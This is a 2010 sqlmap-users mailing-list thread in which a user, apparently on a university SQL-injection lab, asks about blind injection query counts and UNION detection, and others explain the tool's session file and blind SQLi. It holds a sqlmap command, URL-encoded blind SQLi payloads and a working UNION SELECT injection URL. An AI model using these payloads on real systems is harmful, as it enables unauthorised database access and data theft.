Thread: [sqlmap-users] Fw: Which get was the right
From: Beatriz D. <bea...@ya...> - 2010-01-21 06:36:52
For example, you run:

sqlmap -u http://XXX.XXX.XXX.XXX/something/?departamento=0 -v 5 --sql-query "SELECT CURRENT_USER()"

After the execution you find the current user:

[00:11:15] [INFO] retrieved: usqli@localhost
[00:11:15] [DEBUG] performed 112 queries in 87 seconds
SELECT CURRENT_USER(): 'usqli@localhost'

But the results say that 112 queries were tried, like:

something/?departamento=0%20AND%20ORD%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%2810000%29%29%2C%20CHAR%2832%29%29%29%2C%2016%2C%201%29%29%20%3E%201%20AND%20316=316 HTTP/1.1

How can I know which one of the 112 got the result?

________________________________
From: Ignacio Hernández [mailto:nac...@gm...]
Sent: Wednesday, January 20, 2010 06:10 p.m.
To: Duran, Beatriz
Subject: Re: [sqlmap-users] Which get was the right

Hi Beatriz,

When you run sqlmap against a target and one of the tests succeeds, sqlmap tells you that. It tells you the quotes (single or double) and the number of parentheses needed to inject SQL code.

On the latest versions of sqlmap it does the tests just one time and stores the data in a file, telling you where this file is each time you start sqlmap against the same target, for example:

[00:59:06] [INFO] using '/home/nacho/sqlmap/output/www.target.com/session' as session file

You can open that file and see there what test worked.

Sorry about my English, I'm Spanish :)

2010/1/20 Duran, Beatriz wrote:

Hi, after you ran sqlmap to get, for example, the list of tables, it gives you the query applied, but how could you know which test was the one that worked?

Thanks,
From: Beatriz D. <bea...@ya...> - 2010-01-22 08:34:38
Ok, got it; now that takes me to another issue: sqlmap says that the target doesn't work with UNION:

[02:24:17] [WARNING] the target url is not affected by an exploitable full inband sql injection vulnerability
[02:24:17] [INFO] confirming partial (single entry) inband sql injection on parameter 'departamento' by appending a false condition after the parameter value
[02:24:18] [TRAFFIC OUT] HTTP request:
GET /uoc/alumnos/sqlinjection/?departamento=0%20AND%203320=3321%20UNION%20ALL%20SELECT%20NULL%23%20AND%203353=3353 HTTP/1.1

But if I apply directly:

http://X.X.X.X/uoc/alumnos/sqlinjection/?departamento=0%20UNION%20ALL%20SELECT%20NULL,%20%271234%27

It works, the number 1234 is shown as part of a list; is there a way to force sqlmap to work with UNION and avoid the testing that --use-union does?

________________________________
From: Ignacio Hernández <nac...@gm...>
To: Beatriz Duran <bea...@ya...>
Sent: Thu, January 21, 2010 8:41:14 AM
Subject: Re: [sqlmap-users] Fw: Which get was the right

Ok, that's because it is a blind SQL injection. You can google it to find more info about it, but the basic idea is that in blind SQLi you try to figure out the result of the query char by char. For example, if the user is root, you have to first find r, then o... This is like this because in blind SQL injections the database only answers "True" or "False". So you ask the database: is the first char bigger than "a"? Then it answers yes... and so on. That's why there are so many queries, all of them needed to guess the content of the query.
From: Bernardo D. A. G. <ber...@gm...> - 2010-01-22 18:18:31
On Fri, Jan 22, 2010 at 08:34, Beatriz Duran <bea...@ya...> wrote:
> ...
> http://X.X.X.X/uoc/alumnos/sqlinjection/?departamento=0%20UNION%20ALL%20SELECT%20NULL,%20%271234%27
>
> It works, the number 1234 is shown as part of a list; is there a way to
> force sqlmap to work with UNION and avoid the testing that --use-union does?

Not yet. The test for UNION query SQL injection, and the detection phase in general, will be totally rewritten in the next months though.

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F